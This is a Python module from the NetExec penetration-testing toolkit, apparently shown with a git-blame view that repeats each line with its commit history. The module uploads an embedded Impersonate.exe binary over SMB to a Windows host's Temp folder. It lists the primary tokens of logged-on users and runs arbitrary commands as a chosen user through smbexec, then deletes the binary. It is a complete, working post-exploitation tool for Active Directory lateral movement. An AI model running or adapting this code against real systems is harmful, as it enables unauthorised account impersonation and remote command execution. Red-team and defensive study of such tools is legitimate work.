NetExec/nxc/modules/impersonate.py

# Impersonate module for nxc
# Author of the module : https://twitter.com/Defte_
# Impersonate: https://github.com/sensepost/Impersonate
# Token manipulation blog post https://sensepost.com/blog/2022/abusing-windows-tokens-to-compromise-active-directory-without-touching-lsass/

from base64 import b64decode
from os import path
import sys

from nxc.paths import DATA_PATH


class NXCModule:
    name = "impersonate"
    description = "List and impersonate tokens to run command as locally logged on users"
    supported_protocols = ["smb"]
    opsec_safe = True  # could be flagged
    multiple_hosts = True

    def options(self, context, module_options):
        """
        TOKEN     // Token id to usurp
        EXEC      // Command to exec
        IMP_EXE   // Path to the Impersonate binary on your local computer
        """
        self.tmp_dir = "C:\\Windows\\Temp\\"
        self.share = "C$"
        self.tmp_share = self.tmp_dir.split(":")[1]
        self.impersonate = "Impersonate.exe"
        self.useembeded = True
        self.token = self.cmd = ""
        with open(path.join(DATA_PATH, ("impersonate_module/impersonate.bs64"))) as impersonate_file:
            self.impersonate_embedded = b64decode(impersonate_file.read())
        if "EXEC" in module_options:
            self.cmd = module_options["EXEC"]

        if "TOKEN" in module_options:
            self.token = module_options["TOKEN"]

        if "IMP_EXE" in module_options:
            self.imp_exe = module_options["IMP_EXE"]
            self.useembeded = False

    def list_available_primary_tokens(self, _, connection):
        command = f"{self.tmp_dir}Impersonate.exe list"
        return connection.execute(command, True)

    def on_admin_login(self, context, connection):
        if self.useembeded:
            file_to_upload = "/tmp/Impersonate.exe"

            try:
                with open(file_to_upload, "wb") as impersonate:
                    impersonate.write(self.impersonate_embedded)
            except FileNotFoundError:
                context.log.fail(f"Impersonate file specified '{file_to_upload}' does not exist!")
                sys.exit(1)
        else:
            if path.isfile(self.imp_exe):
                file_to_upload = self.imp_exe
            else:
                context.log.error(f"Cannot open {self.imp_exe}")
                sys.exit(1)

        context.log.display(f"Uploading {self.impersonate}")
        with open(file_to_upload, "rb") as impersonate:
            try:
                connection.conn.putFile(self.share, f"{self.tmp_share}{self.impersonate}", impersonate.read)
                context.log.success("Impersonate binary successfully uploaded")
            except Exception as e:
                context.log.fail(f"Error writing file to share {self.tmp_share}: {e}")
                return

        try:
            if self.cmd == "" or self.token == "":
                context.log.display("Listing available primary tokens")
                p = self.list_available_primary_tokens(context, connection)
                for line in p.splitlines():
                    token, token_integrity, token_owner = line.split(" ", 2)
                    context.log.highlight(f"Primary token ID: {token:<2} {token_integrity:<6} {token_owner}")
            else:
                impersonated_user = ""
                p = self.list_available_primary_tokens(context, connection)
                for line in p.splitlines():
                    token_id, token_integrity, token_owner = line.split(" ", 2)
                    if token_id == self.token:
                        impersonated_user = token_owner.strip()
                        break

                if impersonated_user:
                    context.log.display(f"Executing {self.cmd} as {impersonated_user}")
                    command = f'{self.tmp_dir}Impersonate.exe exec {self.token} "{self.cmd}"'
                    for line in connection.execute(command, True, methods=["smbexec"]).splitlines():
                        context.log.highlight(line)
                else:
                    context.log.fail("Invalid token ID submitted")

        except Exception as e:
            context.log.fail(f"Error runing command: {e}")
        finally:
            try:
                connection.conn.deleteFile(self.share, f"{self.tmp_share}{self.impersonate}")
                context.log.success("Impersonate binary successfully deleted")
            except Exception as e:
                context.log.fail(f"Error deleting Impersonate.exe on {self.share}: {e}")
rename folders, files, functions, classes, etc to NetExec/nxc 2023-09-14 21:07:15 +00:00			`# Impersonate module for nxc`
Update impersonate.py I'll add technical links to the blog post explaining token manipulation internals as well as the source code of the original binary when the blog post will be released (should be on monday) 2022-10-29 09:55:34 +00:00			`# Author of the module : https://twitter.com/Defte_`
Update impersonate.py Update the impersonate module so that it prints token integrity :) 2023-07-08 15:38:48 +00:00			`# Impersonate: https://github.com/sensepost/Impersonate`
			`# Token manipulation blog post https://sensepost.com/blog/2022/abusing-windows-tokens-to-compromise-active-directory-without-touching-lsass/`
Update impersonate.py I'll add technical links to the blog post explaining token manipulation internals as well as the source code of the original binary when the blog post will be released (should be on monday) 2022-10-29 09:55:34 +00:00
Final update! 2022-10-27 10:21:46 +00:00			`from base64 import b64decode`
Addind the IMP_EXE option Guess this will be the final one :P 2022-10-29 09:52:48 +00:00			`from os import path`
fix: inform user if impersonate file doesnt exist 2023-10-12 20:03:37 +00:00			`import sys`
Add files via upload 2022-07-04 12:44:35 +00:00
Extract base64 code to file 2023-10-24 20:43:14 +00:00			`from nxc.paths import DATA_PATH`

Update impersonate.py Update the impersonate module so that it prints token integrity :) 2023-07-08 15:38:48 +00:00
ruff autoformat to clean up all the single quotes and other bad formatting 2023-09-23 01:10:21 +00:00			`class NXCModule:`
Add files via upload 2022-07-04 12:44:35 +00:00			`name = "impersonate"`
black v2 formating 2023-05-08 18:39:36 +00:00			`description = "List and impersonate tokens to run command as locally logged on users"`
Add files via upload 2022-07-04 12:44:35 +00:00			`supported_protocols = ["smb"]`
ruff autoformat to clean up all the single quotes and other bad formatting 2023-09-23 01:10:21 +00:00			`opsec_safe = True # could be flagged`
Add files via upload 2022-07-04 12:44:35 +00:00			`multiple_hosts = True`

			`def options(self, context, module_options):`
ruff autoformat to clean up all the single quotes and other bad formatting 2023-09-23 01:10:21 +00:00			`"""`
			`TOKEN // Token id to usurp`
			`EXEC // Command to exec`
			`IMP_EXE // Path to the Impersonate binary on your local computer`
			`"""`
Add files via upload 2022-07-04 12:44:35 +00:00			`self.tmp_dir = "C:\\Windows\\Temp\\"`
			`self.share = "C$"`
			`self.tmp_share = self.tmp_dir.split(":")[1]`
			`self.impersonate = "Impersonate.exe"`
Addind the IMP_EXE option Guess this will be the final one :P 2022-10-29 09:52:48 +00:00			`self.useembeded = True`
Refactor options 2022-10-27 19:32:55 +00:00			`self.token = self.cmd = ""`
Extract base64 code to file 2023-10-24 20:43:14 +00:00			`with open(path.join(DATA_PATH, ("impersonate_module/impersonate.bs64"))) as impersonate_file:`
			`self.impersonate_embedded = b64decode(impersonate_file.read())`
Addind the IMP_EXE option Guess this will be the final one :P 2022-10-29 09:52:48 +00:00			`if "EXEC" in module_options:`
			`self.cmd = module_options["EXEC"]`
Refactor options 2022-10-27 19:32:55 +00:00
Addind the IMP_EXE option Guess this will be the final one :P 2022-10-29 09:52:48 +00:00			`if "TOKEN" in module_options:`
			`self.token = module_options["TOKEN"]`

			`if "IMP_EXE" in module_options:`
			`self.imp_exe = module_options["IMP_EXE"]`
			`self.useembeded = False`
Add files via upload 2022-07-04 12:44:35 +00:00
Update impersonate.py 2022-07-09 16:34:35 +00:00			`def list_available_primary_tokens(self, _, connection):`
Final update! 2022-10-27 10:21:46 +00:00			`command = f"{self.tmp_dir}Impersonate.exe list"`
Update impersonate.py 2022-07-09 16:34:35 +00:00			`return connection.execute(command, True)`
Update impersonate.py Update the impersonate module so that it prints token integrity :) 2023-07-08 15:38:48 +00:00
ruff autoformat to clean up all the single quotes and other bad formatting 2023-09-23 01:10:21 +00:00			`def on_admin_login(self, context, connection):`
Addind the IMP_EXE option Guess this will be the final one :P 2022-10-29 09:52:48 +00:00			`if self.useembeded:`
			`file_to_upload = "/tmp/Impersonate.exe"`
fix: inform user if impersonate file doesnt exist 2023-10-12 20:03:37 +00:00
			`try:`
			`with open(file_to_upload, "wb") as impersonate:`
			`impersonate.write(self.impersonate_embedded)`
ruff: add F841 back in and auto-fix 2023-10-15 17:31:51 +00:00			`except FileNotFoundError:`
fix: inform user if impersonate file doesnt exist 2023-10-12 20:03:37 +00:00			`context.log.fail(f"Impersonate file specified '{file_to_upload}' does not exist!")`
			`sys.exit(1)`
Addind the IMP_EXE option Guess this will be the final one :P 2022-10-29 09:52:48 +00:00			`else:`
			`if path.isfile(self.imp_exe):`
			`file_to_upload = self.imp_exe`
			`else:`
Update impersonate.py Update the impersonate module so that it prints token integrity :) 2023-07-08 15:38:48 +00:00			`context.log.error(f"Cannot open {self.imp_exe}")`
Extract base64 code to file 2023-10-24 20:43:14 +00:00			`sys.exit(1)`
Add files via upload 2022-07-04 12:44:35 +00:00
update to new log function 2023-07-23 15:03:17 +00:00			`context.log.display(f"Uploading {self.impersonate}")`
ruff autoformat to clean up all the single quotes and other bad formatting 2023-09-23 01:10:21 +00:00			`with open(file_to_upload, "rb") as impersonate:`
Add files via upload 2022-07-04 12:44:35 +00:00			`try:`
black v2 formating 2023-05-08 18:39:36 +00:00			`connection.conn.putFile(self.share, f"{self.tmp_share}{self.impersonate}", impersonate.read)`
automatic ruff fixing 2023-09-20 15:59:16 +00:00			`context.log.success("Impersonate binary successfully uploaded")`
Add files via upload 2022-07-04 12:44:35 +00:00			`except Exception as e:`
update to new log function 2023-07-23 15:03:17 +00:00			`context.log.fail(f"Error writing file to share {self.tmp_share}: {e}")`
Add files via upload 2022-07-04 12:44:35 +00:00			`return`

			`try:`
Refactor options 2022-10-27 19:32:55 +00:00			`if self.cmd == "" or self.token == "":`
automatic ruff fixing 2023-09-20 15:59:16 +00:00			`context.log.display("Listing available primary tokens")`
Update impersonate.py 2022-07-09 16:34:35 +00:00			`p = self.list_available_primary_tokens(context, connection)`
Add files via upload 2022-07-04 12:44:35 +00:00			`for line in p.splitlines():`
Update impersonate.py Update the impersonate module so that it prints token integrity :) 2023-07-08 15:38:48 +00:00			`token, token_integrity, token_owner = line.split(" ", 2)`
			`context.log.highlight(f"Primary token ID: {token:<2} {token_integrity:<6} {token_owner}")`
Add files via upload 2022-07-04 12:44:35 +00:00			`else:`
Update impersonate.py 2022-07-09 16:34:35 +00:00			`impersonated_user = ""`
			`p = self.list_available_primary_tokens(context, connection)`
			`for line in p.splitlines():`
Update impersonate.py Update the impersonate module so that it prints token integrity :) 2023-07-08 15:38:48 +00:00			`token_id, token_integrity, token_owner = line.split(" ", 2)`
Final update! 2022-10-27 10:21:46 +00:00			`if token_id == self.token:`
			`impersonated_user = token_owner.strip()`
Update impersonate.py 2022-07-09 16:34:35 +00:00			`break`
Final update! 2022-10-27 10:21:46 +00:00
ruff autoformat to clean up all the single quotes and other bad formatting 2023-09-23 01:10:21 +00:00			`if impersonated_user:`
update to new log function 2023-07-23 15:03:17 +00:00			`context.log.display(f"Executing {self.cmd} as {impersonated_user}")`
ruff autoformat to clean up all the single quotes and other bad formatting 2023-09-23 01:10:21 +00:00			`command = f'{self.tmp_dir}Impersonate.exe exec {self.token} "{self.cmd}"'`
black v2 formating 2023-05-08 18:39:36 +00:00			`for line in connection.execute(command, True, methods=["smbexec"]).splitlines():`
Final update! 2022-10-27 10:21:46 +00:00			`context.log.highlight(line)`
Update impersonate.py 2022-07-09 16:34:35 +00:00			`else:`
automatic ruff fixing 2023-09-20 15:59:16 +00:00			`context.log.fail("Invalid token ID submitted")`
Update impersonate.py 2022-07-09 16:34:35 +00:00
Add files via upload 2022-07-04 12:44:35 +00:00			`except Exception as e:`
update to new log function 2023-07-23 15:03:17 +00:00			`context.log.fail(f"Error runing command: {e}")`
Add files via upload 2022-07-04 12:44:35 +00:00			`finally:`
			`try:`
black v2 formating 2023-05-08 18:39:36 +00:00			`connection.conn.deleteFile(self.share, f"{self.tmp_share}{self.impersonate}")`
automatic ruff fixing 2023-09-20 15:59:16 +00:00			`context.log.success("Impersonate binary successfully deleted")`
Add files via upload 2022-07-04 12:44:35 +00:00			`except Exception as e:`
update to new log function 2023-07-23 15:03:17 +00:00			`context.log.fail(f"Error deleting Impersonate.exe on {self.share}: {e}")`